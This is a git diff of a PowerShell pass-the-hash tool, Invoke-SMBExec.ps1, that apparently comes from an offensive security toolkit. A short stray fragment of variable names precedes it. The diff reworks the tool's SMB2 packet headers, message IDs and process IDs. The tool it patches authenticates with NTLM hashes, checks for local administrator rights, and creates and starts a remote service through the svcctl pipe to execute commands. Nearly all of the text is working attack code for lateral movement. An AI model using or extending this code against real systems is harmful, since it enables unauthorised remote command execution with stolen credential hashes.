$SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { diff --git a/Invoke-SMBExec.ps1 b/Invoke-SMBExec.ps1 index 7a4d868..1a2e3b5 100644 --- a/Invoke-SMBExec.ps1 +++ b/Invoke-SMBExec.ps1 @@ -72,10 +72,10 @@ param [parameter(ParameterSetName='Default',Mandatory=$true)][String]$Username, [parameter(ParameterSetName='Default',Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, - [parameter(ParameterSetName='Default',Mandatory=$false)][ValidateSet("Y","N")][String]$CommandCOMSPEC="Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$CommandCOMSPEC="Y", [parameter(ParameterSetName='Default',Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][String]$Service, - [parameter(ParameterSetName='Default',Mandatory=$true)][Switch]$SigningCheck, + [parameter(ParameterSetName='Default',Mandatory=$false)][Switch]$SigningCheck, [parameter(ParameterSetName='Session',Mandatory=$false)][Int]$Session, [parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Logoff, [parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Refresh, @@ -127,6 +127,8 @@ function New-PacketSMBHeader { param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID) + $packet_process_ID = $packet_process_ID[0,1] + $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42)) $packet_SMBHeader.Add("Command",$packet_command) @@ -338,7 +340,7 @@ function New-PacketSMBLogoffAndXRequest } #SMB2 - +<# function New-PacketSMB2Header { param([Byte[]]$packet_command,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) @@ -352,7 +354,7 @@ function New-PacketSMB2Header $packet_SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00)) $packet_SMB2Header.Add("Reserved",[Byte[]](0x00,0x00)) $packet_SMB2Header.Add("Command",$packet_command) - $packet_SMB2Header.Add("CreditRequest",[Byte[]](0x00,0x00)) + $packet_SMB2Header.Add("CreditRequest",[Byte[]](0x01,0x00)) $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("MessageID",$packet_message_ID) @@ -363,6 +365,31 @@ function New-PacketSMB2Header return $packet_SMB2Header } +#> +function New-PacketSMB2Header +{ + param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) + + [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00 + + $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMB2Header.Add("ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42)) + $packet_SMB2Header.Add("StructureSize",[Byte[]](0x40,0x00)) + $packet_SMB2Header.Add("CreditCharge",[Byte[]](0x01,0x00)) + $packet_SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00)) + $packet_SMB2Header.Add("Reserved",[Byte[]](0x00,0x00)) + $packet_SMB2Header.Add("Command",$packet_command) + $packet_SMB2Header.Add("CreditRequest",$packet_credit_request) + $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2Header.Add("MessageID",$packet_message_ID) + $packet_SMB2Header.Add("ProcessID",$packet_process_ID) + $packet_SMB2Header.Add("TreeID",$packet_tree_ID) + $packet_SMB2Header.Add("SessionID",$packet_session_ID) + $packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + + return $packet_SMB2Header +} function New-PacketSMB2NegotiateProtocolRequest { @@ -870,7 +897,6 @@ if($session_string) $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) -$process_ID = $process_ID -replace "-00-00","" [Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} if(!$session_string) @@ -1008,7 +1034,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table $SMB2_tree_ID = 0x00,0x00,0x00,0x00 $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 $SMB2_message_ID = 1 - $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -1044,8 +1070,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } else { - $SMB2_message_ID += 1 - $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $SMB_negotiate_flags $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate @@ -1182,8 +1208,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } else { - $SMB2_message_ID += 1 - $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $NTLMSSP_response $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth @@ -1560,7 +1586,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'CreateServiceW' { $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID - + if($SMB_signing) { $packet_SMB_header["Flags2"] = 0x05,0x48 @@ -2023,8 +2049,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'TreeConnect' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2065,12 +2090,10 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'CreateRequest' { - #$SMB2_tree_ID = 0x01,0x00,0x00,0x00 $SMB2_tree_ID = $SMB_client_receive[40..43] $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2124,8 +2147,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl $SMB_file_ID = $SMB_client_receive[132..147] $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2160,12 +2182,9 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'ReadRequest' { - Start-Sleep -m $Sleep $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 - $packet_SMB2_header["CreditCharge"] = 0x10,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2173,6 +2192,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } $packet_SMB2_data = New-PacketSMB2ReadRequest $SMB_file_ID + $packet_SMB2_data["Length"] = 0xff,0x00,0x00,0x00 $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length @@ -2216,9 +2236,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'OpenSCManagerW' { - $SMB2_message_ID += 23 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2280,7 +2299,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table else { Write-Output "$output_username is a local administrator on $Target" - $SMB2_message_ID += 20 + $SMB2_message_ID++ $SMB_close_service_handle_stage = 2 $SMB_client_stage = 'CloseServiceHandle' } @@ -2304,9 +2323,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table if($SMBExec_command_bytes.Length -lt $SMB_split_index) { - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2348,9 +2366,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'CreateServiceW_First' { $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index) - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2399,8 +2416,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table { $SMB_split_stage++ $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2447,8 +2463,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'CreateServiceW_Last' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2489,9 +2504,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table { Write-Verbose "Service $SMB_service created on $Target" $SMB_service_context_handle = $SMB_client_receive[112..131] - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2551,9 +2565,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table Write-Output "Service $SMB_service failed to start on $Target" } - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2595,7 +2608,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table if($SMB_close_service_handle_stage -eq 1) { Write-Verbose "Service $SMB_service deleted on $Target" - $SMB2_message_ID += 20 + $SMB2_message_ID++ $SMB_close_service_handle_stage++ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle } @@ -2606,8 +2619,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle } - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2641,9 +2653,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'CloseRequest' { - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2675,8 +2686,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'TreeDisconnect' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2716,9 +2726,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'Logoff' { - $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["CreditRequest"] = 0x7f,0x00 + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2744,6 +2753,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'Exit' } } |